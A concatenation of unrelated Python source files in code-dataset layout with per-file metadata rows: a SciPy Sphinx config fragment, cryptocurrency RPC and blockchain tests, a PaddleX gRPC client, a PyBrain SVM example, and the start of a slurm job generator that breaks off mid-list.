# -----------------------------------------------------------------------------
html_theme = 'pydata_sphinx_theme'
html_logo = '_static/logo.svg'
html_favicon = '_static/favicon.ico'
html_theme_options = {
"logo_link": "index",
"github_url": "https://github.com/scipy/scipy",
"navbar_start": ["navbar-logo", "version"],
}
if 'versionwarning' in tags:
# Specific to docs.scipy.org deployment.
# See https://github.com/scipy/docs.scipy.org/blob/master/_static/versionwarning.js_t
src = ('var script = document.createElement("script");\n'
'script.type = "text/javascript";\n'
'script.src = "/doc/_static/versionwarning.js";\n'
'document.head.appendChild(script);');
html_context = {
'VERSIONCHECK_JS': src,
'versionwarning': True
}
html_js_files = ['versioncheck.js']
else:
html_context = {
'versionwarning': False
}
html_title = "%s v%s Manual" % (project, version)
html_static_path = ['_static']
html_last_updated_fmt = '%b %d, %Y'
html_css_files = [
"scipy.css",
]
# html_additional_pages = {
# 'index': 'indexcontent.html',
# }
html_additional_pages = {}
html_use_modindex = True
html_domain_indices = False
html_copy_source = False
html_file_suffix = '.html'
htmlhelp_basename = 'scipy'
mathjax_path = "scipy-mathjax/MathJax.js?config=scipy-mathjax"
# -----------------------------------------------------------------------------
# LaTeX output
# -----------------------------------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
_stdauthor = 'Written by the SciPy community'
latex_documents = [
('index', 'scipy-ref.tex', 'SciPy Reference Guide', _stdauthor, 'manual'),
# ('user/index', 'scipy-user.tex', 'SciPy User Guide',
# _stdauthor, 'manual'),
]
# Not available on many systems:
latex_use_xindy = False
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = False
# fix issues with Unicode characters
latex_engine = 'xelatex'
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': r'''
% In the parameters etc. sections, align uniformly, and adjust label emphasis
\usepackage{expdlist}
\let\latexdescription=\description
\let\endlatexdescription=\enddescription
\renewenvironment{description}
{\renewenvironment{description}
{\begin{latexdescription}%
[\setleftmargin{50pt}\breaklabel\setlabelstyle{\bfseries}]%
}%
{\end{latexdescription}}%
\begin{latexdescription}%
[\setleftmargin{15pt}\breaklabel\setlabelstyle{\bfseries\itshape}]%
}%
{\end{latexdescription}}
% Fix bug in expdlist's modified \@item
\usepackage{etoolbox}
\makeatletter
\patchcmd\@item{{\@breaklabel} }{{\@breaklabel}}{}{}
% Fix bug in expdlist's way of breaking the line after long item label
\def\breaklabel{%
\def\@breaklabel{%
\leavevmode\par
% now a hack because Sphinx inserts \leavevmode after term node
\def\leavevmode{\def\leavevmode{\unhbox\voidb@x}}%
}%
}
\makeatother
% Make Examples/etc section headers smaller and more compact
\titlespacing*{\paragraph}{0pt}{1ex}{0pt}
% Save vertical space in parameter lists and elsewhere
\makeatletter
\renewenvironment{quote}%
{\list{}{\topsep=0pt\relax
\parsep \z@ \@plus\p@}%
\item\relax}%
{\endlist}
\makeatother
% Avoid small font size in code-blocks
\fvset{fontsize=auto}
% Use left-alignment per default in tabulary rendered tables
\newcolumntype{T}{L}
% Get some useful deeper bookmarks and table of contents in PDF
\setcounter{tocdepth}{1}
% Fix: ≠ is unknown to XeLaTeX's default font Latin Modern
\usepackage{newunicodechar}
\newunicodechar{≠}{\ensuremath{\neq}}
% Get PDF to use maximal depth bookmarks
\hypersetup{bookmarksdepth=subparagraph}
% reduce hyperref warnings
\pdfstringdefDisableCommands{%
\let\sphinxupquote\empty
\let\sphinxstyleliteralintitle\empty
\let\sphinxstyleemphasis\empty
}
''',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
# benefit from Sphinx built-in workaround of LaTeX's list limitations
'maxlistdepth': '12',
# reduce TeX warnings about underfull boxes in the index
'printindex': r'\raggedright\printindex',
# avoid potential problems arising from erroneous mark-up of the
# \mathbf{\Gamma} type
'passoptionstopackages': r'\PassOptionsToPackage{no-math}{fontspec}',
}
# -----------------------------------------------------------------------------
# Intersphinx configuration
# -----------------------------------------------------------------------------
intersphinx_mapping = {
'python': ('https://docs.python.org/dev', None),
'numpy': ('https://numpy.org/devdocs', None),
'neps': ('https://numpy.org/neps', None),
'matplotlib': ('https://matplotlib.org', None),
'asv': ('https://asv.readthedocs.io/en/stable/', None),
}
# -----------------------------------------------------------------------------
# Numpy extensions
# -----------------------------------------------------------------------------
# If we want to do a phantom import from an XML file for all autodocs
phantom_import_file = 'dump.xml'
# Generate plots for example sections
numpydoc_use_plots = True
np_docscrape.ClassDoc.extra_public_methods = [ # should match class.rst
'__call__', '__mul__', '__getitem__', '__len__',
]
# -----------------------------------------------------------------------------
# Autosummary
# -----------------------------------------------------------------------------
autosummary_generate = True
# -----------------------------------------------------------------------------
# Autodoc
# -----------------------------------------------------------------------------
autodoc_default_options = {
'inherited-members': None,
}
autodoc_typehints = 'none'
# -----------------------------------------------------------------------------
# Coverage checker
# -----------------------------------------------------------------------------
coverage_ignore_modules = r"""
""".split()
coverage_ignore_functions = r"""
test($|_) (some|all)true bitwise_not cumproduct pkgload
generic\.
""".split()
coverage_ignore_classes = r"""
""".split()
coverage_c_path = []
coverage_c_regexes = {}
coverage_ignore_c_items = {}
#------------------------------------------------------------------------------
# Matplotlib plot_directive options
#------------------------------------------------------------------------------
plot_pre_code = """
import numpy as np
np.random.seed(123)
"""
plot_include_source = True
plot_formats = [('png', 96), 'pdf']
plot_html_show_formats = False
plot_html_show_source_link = False
import math
phi = (math.sqrt(5) + 1)/2
font_size = 13*72/96.0 # 13 px
plot_rcparams = {
'font.size': font_size,
'axes.titlesize': font_size,
'axes.labelsize': font_size,
'xtick.labelsize': font_size,
'ytick.labelsize': font_size,
'legend.fontsize': font_size,
'figure.figsize': (3*phi, 3),
'figure.subplot.bottom': 0.2,
'figure.subplot.left': 0.2,
'figure.subplot.right': 0.9,
'figure.subplot.top': 0.85,
'figure.subplot.wspace': 0.4,
'text.usetex': False,
}
# -----------------------------------------------------------------------------
# Source code links
# -----------------------------------------------------------------------------
import re
import inspect
from os.path import relpath, dirname
# Probe the possible providers of the linkcode extension in preference order
# and register the first one that imports successfully.  The for/else branch
# runs only when no candidate could be imported.
for name in ['sphinx.ext.linkcode', 'linkcode', 'numpydoc.linkcode']:
    try:
        __import__(name)
        extensions.append(name)
        break
    except ImportError:
        pass
else:
    print("NOTE: linkcode extension not found -- no links to source generated")
def linkcode_resolve(domain, info):
    """Return the GitHub source URL for the documented Python object.

    Called by the Sphinx linkcode extension with ``domain`` (e.g. ``'py'``)
    and ``info`` containing ``'module'`` and ``'fullname'``.  Returns ``None``
    whenever the object cannot be resolved to a file inside the scipy tree.
    """
    if domain != 'py':
        return None

    module = sys.modules.get(info['module'])
    if module is None:
        return None

    # Walk the dotted attribute path down from the module object.
    obj = module
    for attr in info['fullname'].split('.'):
        try:
            obj = getattr(obj, attr)
        except Exception:
            return None

    # Locate the defining source file, falling back to the object's module.
    try:
        fn = inspect.getsourcefile(obj)
    except Exception:
        fn = None
    if not fn:
        try:
            fn = inspect.getsourcefile(sys.modules[obj.__module__])
        except Exception:
            fn = None
    if not fn:
        return None

    # Build a "#Lstart-Lend" fragment when the source lines are recoverable.
    try:
        source, lineno = inspect.getsourcelines(obj)
    except Exception:
        lineno = None
    linespec = "#L%d-L%d" % (lineno, lineno + len(source) - 1) if lineno else ""

    startdir = os.path.abspath(os.path.join(dirname(scipy.__file__), '..'))
    fn = relpath(fn, start=startdir).replace(os.path.sep, '/')
    if not fn.startswith('scipy/'):
        return None

    # Pick the git ref: exact commit for dev0+<hash> builds, master for other
    # dev builds, the release tag otherwise.
    m = re.match(r'^.*dev0\+([a-f0-9]+)$', scipy.__version__)
    if m:
        return "https://github.com/scipy/scipy/blob/%s/%s%s" % (
            m.group(1), fn, linespec)
    if 'dev' in scipy.__version__:
        return "https://github.com/scipy/scipy/blob/master/%s%s" % (
            fn, linespec)
    return "https://github.com/scipy/scipy/blob/v%s/%s%s" % (
        scipy.__version__, fn, linespec)
| 31.318982 | 89 | 0.615909 |
acf699b0602ae5f7f6bc5f916ff63475e3be9513 | 4,873 | py | Python | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | test/functional/interface_http.py | republic-productions/finalcoin | 7c0f335ded1e5c662034c822ca2c474b8e62778f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Finalcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import FinalcoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (FinalcoinTestFramework):
    """Exercise the node's HTTP/JSON-RPC layer: keep-alive semantics on
    persistent connections, explicit Connection headers, the -rpcservertimeout
    style keep-alive toggle (node1), and oversized-request handling."""
    def set_test_params(self):
        self.num_nodes = 3
        self.supports_cli = False
    def setup_network(self):
        # Nodes are queried independently; no P2P connections needed.
        self.setup_nodes()
    def run_test(self):
        """Issue raw HTTP requests against the three nodes and check
        connection lifetime and status codes."""
        #################################################
        # lowlevel check for http persistent connection #
        #################################################
        url = urllib.parse.urlparse(self.nodes[0].url)
        authpair = f'{url.username}:{url.password}'
        headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1 #must also response with a correct json-rpc message
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        conn.close()
        #same should be if we add keep-alive because this should be the std. behaviour
        headers = {"Authorization": f"Basic {str_to_b64str(authpair)}", "Connection": "keep-alive"}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1 #must also response with a correct json-rpc message
        assert conn.sock is not None #according to http/1.1 connection must still be open!
        conn.close()
        #now do the same with "Connection: close"
        headers = {"Authorization": f"Basic {str_to_b64str(authpair)}", "Connection":"close"}
        conn = http.client.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is None #now the connection must be closed after the response
        #node1 (2nd node) is running with disabled keep-alive option
        urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
        authpair = f'{urlNode1.username}:{urlNode1.password}'
        headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
        conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
        urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
        authpair = f'{urlNode2.username}:{urlNode2.password}'
        headers = {"Authorization": f"Basic {str_to_b64str(authpair)}"}
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert b'"error":null' in out1
        assert conn.sock is not None #connection must still be open: finalcoind uses keep-alive by default
        # Check excessive request size
        # A moderately long URI (~1000 chars) should be routed and rejected as
        # NOT_FOUND; a huge one (~10000 chars) should be refused outright as
        # BAD_REQUEST by the HTTP layer.
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', f'/{"x"*1000}', '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.NOT_FOUND)
        conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', f'/{"x"*10000}', '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| 44.3 | 116 | 0.640468 |
acf69c45726ce4723dd7b4917a34968ecaf3a7da | 6,182 | py | Python | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 18 | 2021-11-30T04:02:13.000Z | 2022-03-24T12:33:57.000Z | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 1 | 2022-02-04T17:07:38.000Z | 2022-02-04T17:07:38.000Z | node/blockchain/tests/test_models/test_block/test_coin_transfer.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 5 | 2022-01-31T05:28:13.000Z | 2022-03-08T17:25:31.000Z | import pytest
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
AccountState, Block, BlockMessageUpdate, CoinTransferSignedChangeRequest, CoinTransferSignedChangeRequestMessage
)
from node.blockchain.inner_models.signed_change_request_message import CoinTransferTransaction
from node.blockchain.models import AccountState as DBAccountState
from node.blockchain.models.block import Block as ORMBlock
from node.blockchain.types import AccountLock, Signature, Type
from node.core.exceptions import ValidationError
from node.core.utils.cryptography import is_signature_valid
def _assert_coin_transfer_block(block, block_message, expected_number, expected_identifier, signer_public_key):
    """Assert the signature validity and message fields shared by both the
    freshly produced block and its database round-trip copy."""
    assert block.signer == signer_public_key
    assert isinstance(block.signature, str)
    assert is_signature_valid(
        block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
    )
    message = block.message
    assert message.number == expected_number
    assert message.identifier == expected_identifier
    assert message.type == Type.COIN_TRANSFER
    assert message == block_message


@pytest.mark.django_db
def test_add_block_from_block_message(coin_transfer_block_message, primary_validator_key_pair, treasury_amount):
    """A block built from a prepared block message is signed by the primary
    validator, persists, deserializes identically, and updates the account
    state write-through cache."""
    blockchain_facade = BlockchainFacade.get_instance()
    expected_block_number = blockchain_facade.get_next_block_number()
    expected_identifier = blockchain_facade.get_next_block_identifier()
    block = blockchain_facade.add_block_from_block_message(
        message=coin_transfer_block_message,
        signing_key=primary_validator_key_pair.private,
        validate=False,
    )
    _assert_coin_transfer_block(
        block, coin_transfer_block_message, expected_block_number, expected_identifier,
        primary_validator_key_pair.public
    )
    # Test rereading the block from the database
    orm_block = ORMBlock.objects.get(_id=expected_block_number)
    block = Block.parse_raw(orm_block.body)
    _assert_coin_transfer_block(
        block, coin_transfer_block_message, expected_block_number, expected_identifier,
        primary_validator_key_pair.public
    )
    # Test account state write-through cache
    # NOTE(review): 4 presumably covers the signer plus three recipient/node
    # accounts produced by the fixture — confirm against the fixture's txs.
    assert DBAccountState.objects.count() == 4
    request = coin_transfer_block_message.request
    account_state = DBAccountState.objects.get(_id=request.signer)
    assert account_state.account_lock == request.make_hash()
    assert account_state.balance == treasury_amount - request.message.get_total_amount()
    assert account_state.node is None
@pytest.mark.usefixtures('base_blockchain')
def test_add_block_from_signed_change_request(
    treasure_coin_transfer_signed_change_request, regular_node, self_node, primary_validator_key_pair, treasury_amount
):
    """A block built directly from a signed change request carries that request,
    produces the expected account-balance update, and round-trips through the
    database unchanged."""
    blockchain_facade = BlockchainFacade.get_instance()
    expected_block_number = blockchain_facade.get_next_block_number()
    expected_identifier = blockchain_facade.get_next_block_identifier()
    block = blockchain_facade.add_block_from_signed_change_request(
        treasure_coin_transfer_signed_change_request, signing_key=primary_validator_key_pair.private
    )
    assert block.signer == primary_validator_key_pair.public
    assert isinstance(block.signature, str)
    assert is_signature_valid(
        block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
    )
    message = block.message
    assert message.number == expected_block_number
    assert message.identifier == expected_identifier
    assert message.type == Type.COIN_TRANSFER
    assert message.request == treasure_coin_transfer_signed_change_request
    # Expected balances: the treasury is debited by the total transferred;
    # NOTE(review): 100 and 4 presumably match the fixture's transfer amount
    # and the node fee — confirm against the request fixture.
    expected_message_update = BlockMessageUpdate(
        accounts={
            treasure_coin_transfer_signed_change_request.signer:
                AccountState(
                    balance=treasury_amount - treasure_coin_transfer_signed_change_request.message.get_total_amount(),
                    account_lock=treasure_coin_transfer_signed_change_request.make_hash(),
                ),
            regular_node.identifier:
                AccountState(
                    balance=100,
                    account_lock=None,
                ),
            self_node.identifier:
                AccountState(
                    balance=4,
                    account_lock=None,
                ),
        }
    )
    assert message.update == expected_message_update
    # Reread the block from the database and verify it deserializes identically.
    orm_block = ORMBlock.objects.get(_id=expected_block_number)
    block = Block.parse_raw(orm_block.body)
    assert block.signer == primary_validator_key_pair.public
    assert isinstance(block.signature, str)
    assert is_signature_valid(
        block.signer, block.message.make_binary_representation_for_cryptography(), Signature(block.signature)
    )
    message = block.message
    assert message.number == expected_block_number
    assert message.identifier == expected_identifier
    assert message.type == Type.COIN_TRANSFER
    assert message.request == treasure_coin_transfer_signed_change_request
    assert message.update == expected_message_update
@pytest.mark.usefixtures('base_blockchain')
def test_add_block_from_signed_change_request_account_lock_validation(
    treasury_account_key_pair, regular_node, self_node
):
    """Adding a block whose signed change request carries a stale account lock
    must be rejected with a validation error."""
    facade = BlockchainFacade.get_instance()

    stale_lock = AccountLock('0' * 64)
    # Sanity check: the fabricated lock really differs from the current one.
    assert facade.get_account_lock(treasury_account_key_pair.public) != stale_lock

    transactions = [
        CoinTransferTransaction(recipient='1' * 64, amount=10),
        CoinTransferTransaction(recipient=self_node.identifier, amount=self_node.fee, is_fee=True),
    ]
    signed_request = CoinTransferSignedChangeRequest.create_from_signed_change_request_message(
        message=CoinTransferSignedChangeRequestMessage(account_lock=stale_lock, txs=transactions),
        signing_key=treasury_account_key_pair.private,
    )

    with pytest.raises(ValidationError, match='Invalid account lock'):
        facade.add_block_from_signed_change_request(signed_request)
| 43.535211 | 118 | 0.763022 |
acf69c6a7e90bd71bea74fd1c754cab0c79561a8 | 5,342 | py | Python | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | 4 | 2021-05-07T00:50:02.000Z | 2022-03-23T07:57:36.000Z | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | null | null | null | App/client/client_core.py | Reatris/PaddleX_studio | fa6b5aee99bd41450752c7dba2f8b10a1457ef25 | [
"Apache-2.0"
] | 4 | 2021-05-04T09:35:45.000Z | 2021-12-08T08:14:50.000Z | import os,sys
# sys.path.append('../Packages')
import grpc
import os
import psutil
import signal
def getAllPid():
    """Return a mapping of pid -> process name for all running processes.

    A process may terminate (or become non-inspectable) between the
    ``psutil.pids()`` snapshot and the ``Process`` lookup; such entries are
    skipped instead of crashing the whole scan with ``NoSuchProcess``.
    """
    pid_dict = {}
    for pid in psutil.pids():
        try:
            pid_dict[pid] = psutil.Process(pid).name()
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            # Process exited mid-scan or cannot be inspected; ignore it.
            continue
    return pid_dict
def kill(pid):
    """Send SIGABRT to *pid*, reporting success or a missing process.

    Any failure (typically a nonexistent pid) is swallowed after printing
    a notice, so callers never see an exception.
    """
    try:
        result = os.kill(pid, signal.SIGABRT)
        print('已杀死pid为{}的进程, 返回值是:{}'.format(pid, result))
    except Exception:
        print('没有如此进程!!!')
def app_kill():
    """Kill every 'App.exe' process except the last one listed.

    NOTE(review): the final matching pid is deliberately left alive —
    presumably the currently running instance — mirroring the original
    skip-last loop; confirm that is the intended behaviour.
    """
    app_pids = [pid for pid, name in getAllPid().items() if name == "App.exe"]
    for pid in app_pids[:-1]:
        kill(pid)
# sys.path.append(os.path.join(os.getcwd(),'../example'))
from example import PaddleXserver_pb2
from example import PaddleXserver_pb2_grpc
import cv2
app_kill()
import paddlex as pdx
import numpy as np
import base64
def image_to_base64(img):
    """Encode an OpenCV image array as a base64 JPEG string.

    ``cv2.imencode`` returns ``(success_flag, buffer)``; the buffer's raw
    bytes are base64-encoded and decoded to ``str`` for transport.
    """
    # ndarray.tostring() is deprecated and removed in NumPy 2.0; tobytes()
    # is the exact byte-for-byte equivalent.
    img_str = cv2.imencode('.jpg', img)[1].tobytes()
    b64_code = base64.b64encode(img_str)  # encode as base64
    img_str = str(b64_code, encoding='utf-8')
    return img_str
def base64_to_image(img):
    """Decode a base64 JPEG string back into an OpenCV image array."""
    img_b64decode = base64.b64decode(img)  # base64 decode
    # np.fromstring on binary data is deprecated (removed in NumPy 2.0);
    # np.frombuffer is the supported zero-copy equivalent.
    img_array = np.frombuffer(img_b64decode, np.uint8)
    # NOTE(review): cv2.imdecode's second argument is an IMREAD_* flag;
    # cv2.COLOR_BGR2RGB (== 4 == IMREAD_ANYCOLOR) only works by numeric
    # coincidence — confirm intent, likely cv2.IMREAD_COLOR was meant.
    img = cv2.imdecode(img_array, cv2.COLOR_BGR2RGB)
    return img
class Predict_det:
    '''
    Client-side prediction object.

    Wraps an insecure gRPC channel to the PaddleX inference server and
    exposes one helper per task type (detection, instance segmentation,
    classification, semantic segmentation).  Frames are shipped to the
    server base64-encoded; responses are rebuilt into the dict format
    expected by ``paddlex``'s visualization helpers.
    '''
    def __init__(self,channel,model_dir,use_gpu,gpu_id = '0'):
        # Connect to the rpc server
        self.channel = grpc.insecure_channel(channel) #str, e.g. "host:port"
        # Call the rpc service:
        # the stub is used to invoke server-side methods
        self.stub = PaddleXserver_pb2_grpc.PaddleXserverStub(self.channel)
        self.model_dir = model_dir  # path of the exported model on the server
        self.use_gpu = use_gpu      # whether the server should use the GPU
        self.gpu_id = gpu_id        # GPU device id (string)
    def load_model(self):
        '''
        Send the init parameters to the server, have it load the model,
        and return the server-reported load result.
        '''
        # print('use model_dir'+self.model_dir)
        respone = self.stub.paddlex_init(PaddleXserver_pb2.paddlex_init_cmd(
            model_dir = self.model_dir,
            use_gpu = self.use_gpu,
            gpu_id = self.gpu_id
        ))
        return respone.init_result
    def pdx_predict_det(self,img):
        '''
        Object-detection endpoint.
        Sends the frame to the server for prediction, rebuilds the filtered
        boxes from the response, and returns the visualized image.
        '''
        or_img = img
        img = image_to_base64(img)
        respone = self.stub.paddlex_predict_det(PaddleXserver_pb2.image(
            _image = img
        ))
        # Convert protobuf box messages into the dict format pdx expects.
        result = []
        for value in respone.boxes:
            dict_temp = {}
            dict_temp['category_id'] = value.category_id
            dict_temp['bbox'] = []
            dict_temp['bbox'].append(value.bbox.xmin)
            dict_temp['bbox'].append(value.bbox.ymin)
            dict_temp['bbox'].append(value.bbox.width)
            dict_temp['bbox'].append(value.bbox.height)
            dict_temp['score'] = value.score
            dict_temp['category'] = value.category
            result.append(dict_temp)
        visualize_img = pdx.det.visualize(or_img,result,threshold=0,save_dir=None)
        return visualize_img
    def pdx_predict_det_seg(self,img):
        '''
        Instance-segmentation endpoint.
        Sends the frame to the server, rebuilds the boxes (including the
        base64-encoded masks) from the response, and returns the
        visualized image.
        '''
        or_img = img
        img = image_to_base64(img)
        respone = self.stub.paddlex_predict_det_seg(PaddleXserver_pb2.image(
            _image = img
        ))
        result = []
        for value in respone.boxes_seg:
            dict_temp = {}
            dict_temp['category_id'] = value.category_id
            dict_temp['bbox'] = []
            dict_temp['bbox'].append(value.bbox.xmin)
            dict_temp['bbox'].append(value.bbox.ymin)
            dict_temp['bbox'].append(value.bbox.width)
            dict_temp['bbox'].append(value.bbox.height)
            dict_temp['score'] = value.score
            dict_temp['mask'] = base64_to_image(value._mask)
            dict_temp['category'] = value.category
            result.append(dict_temp)
        visualize_img = pdx.det.visualize(or_img,result,threshold=0,save_dir=None)
        return visualize_img
    def pdx_predict_cls(self,img):
        '''
        Image-classification endpoint.
        Sends the frame to the server and returns a single-element result
        list with the predicted category.
        '''
        img = image_to_base64(img)
        respone = self.stub.paddlex_predict_cls(PaddleXserver_pb2.image(
            _image = img
        ))
        result = []
        dict_temp = {}
        dict_temp['category_id'] = respone.category_id
        dict_temp['score'] = respone.score
        dict_temp['category'] = respone.category
        result.append(dict_temp)
        return result
    def pdx_predict_seg(self,img):
        '''
        Semantic-segmentation endpoint.
        Sends the frame to the server, reassembles the per-class score maps
        and the label map from the response, and returns the visualized
        (blended) image.
        '''
        or_img = img
        img = image_to_base64(img)
        respone = self.stub.paddlex_predict_seg(PaddleXserver_pb2.image(
            _image = img
        ))
        dict_temp = {}
        dict_temp['score_map'] = []
        # Each score map arrives as a base64 image; normalize to [0, 1]
        # float32 and stack along the channel axis.
        for value in respone._score_map:
            temp = base64_to_image(value.value)
            temp = temp[:,:,np.newaxis]/255
            dict_temp['score_map'].append(temp.astype('float32'))
        dict_temp['score_map'] = np.concatenate(dict_temp['score_map'],axis=2)
        dict_temp['label_map'] = base64_to_image(respone.label_map)
        visualize_img = pdx.seg.visualize(or_img, dict_temp, weight=respone.set_threshold, save_dir=None, color=None)
        return visualize_img
| 29.351648 | 117 | 0.602396 |
acf69da83b911af6910b3464568ea3b4c2be0b6c | 2,246 | py | Python | examples/supervised/neuralnets+svm/example_svm.py | rueckstiess/pybrain | 8fc950d700aaf9d5012911d53714afb4b18225c3 | [
"BSD-3-Clause"
] | 3 | 2015-03-21T21:42:28.000Z | 2018-07-12T04:21:32.000Z | examples/supervised/neuralnets+svm/example_svm.py | bayerj/pybrain | cfef28152bd60cedfdae5390c599d4fe4d2ec095 | [
"BSD-3-Clause"
] | null | null | null | examples/supervised/neuralnets+svm/example_svm.py | bayerj/pybrain | cfef28152bd60cedfdae5390c599d4fe4d2ec095 | [
"BSD-3-Clause"
] | null | null | null | """ Example script for SVM classification using PyBrain and LIBSVM
CAVEAT: Needs the libsvm Python file svm.py and the corresponding (compiled) library to reside in the Python path! """
__author__ = "Martin Felder"
__version__ = '$Id$'
import pylab as p
import logging
from os.path import join
# load the necessary components
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.structure.modules.svmunit import SVMUnit
from pybrain.supervised.trainers.svmtrainer import SVMTrainer
# import some local stuff
from datasets import generateClassificationData, plotData, generateGridData
logging.basicConfig(level=logging.INFO, filename=join('.','testrun.log'),
format='%(asctime)s %(levelname)s %(message)s')
logging.getLogger('').addHandler(logging.StreamHandler())
# load the training and test data sets
trndata = generateClassificationData(20, nClasses=2)
tstdata = generateClassificationData(100, nClasses=2)
# initialize the SVM module and a corresponding trainer
svm = SVMUnit()
trainer = SVMTrainer( svm, trndata )
# train the with fixed meta-parameters
log2C=0. # degree of slack
log2g=1.1 # width of RBF kernels
trainer.train( log2C=log2C, log2g=log2g )
# alternatively, could train the SVM using design-of-experiments grid search
##trainer.train( search="GridSearchDOE" )
# pass data sets through the SVM to get performance
trnresult = percentError( svm.activateOnDataset(trndata), trndata['target'] )
tstresult = percentError( svm.activateOnDataset(tstdata), tstdata['target'] )
print "sigma: %7g, C: %7g, train error: %5.2f%%, test error: %5.2f%%" % (2.0**log2g, 2.0**log2C, trnresult, tstresult)
# generate a grid dataset
griddat, X, Y = generateGridData(x=[-4,8,0.1],y=[-2,3,0.1])
# pass the grid through the SVM, but this time get the raw distance
# from the boundary, not the class
Z = svm.activateOnDataset(griddat, values=True)
# the output format is a bit weird... make it into a decent array
Z = p.array([z.values()[0] for z in Z]).reshape(X.shape)
# make a 2d plot of training data with an decision value contour overlay
fig = p.figure()
plotData(trndata)
p.contourf(X, Y, Z)
p.show()
| 36.819672 | 121 | 0.735975 |
acf69f785e2d545dc652e7c244a1fb779b55d2f4 | 5,082 | py | Python | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | 2 | 2021-09-16T14:47:43.000Z | 2021-10-31T04:55:16.000Z | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | null | null | null | experiments/2020-08-27-equals-lock-in/hpcc/gen_sub_multi.py | FergusonAJ/plastic-evolvability-avida | 441a91f1cafa2a0883f8f3ce09c8894efa963e7c | [
"MIT"
] | 2 | 2020-08-19T20:01:14.000Z | 2020-12-21T21:24:12.000Z | '''
Generate slurm job submission scripts - one per condition
'''
import argparse, os, sys, errno, subprocess, csv
from pyvarco import CombinationCollector
# Base value for RANDOM_SEED assignment; presumably chosen to keep this
# experiment's seed range disjoint from other experiments' — TODO confirm.
seed_offset = 2000
# Replicates per condition when --replicates is not given on the command line.
default_num_replicates = 30
# Slurm resource requests substituted into the <<...>> placeholders of the
# base submission script.
job_time_request = "48:00:00"
job_memory_request = "4G"
job_name = "avida"
# Name of the Avida executable each job invokes.
executable = "avida"
# Template submission script whose placeholders are filled in by main().
base_script_filename = './base_script.txt'
# Create combo object to collect all conditions we'll run
combos = CombinationCollector()
combos.register_var('EVENT_FILE')
# The single varied factor: which Avida event file each condition uses.
combos.add_val('EVENT_FILE', [\
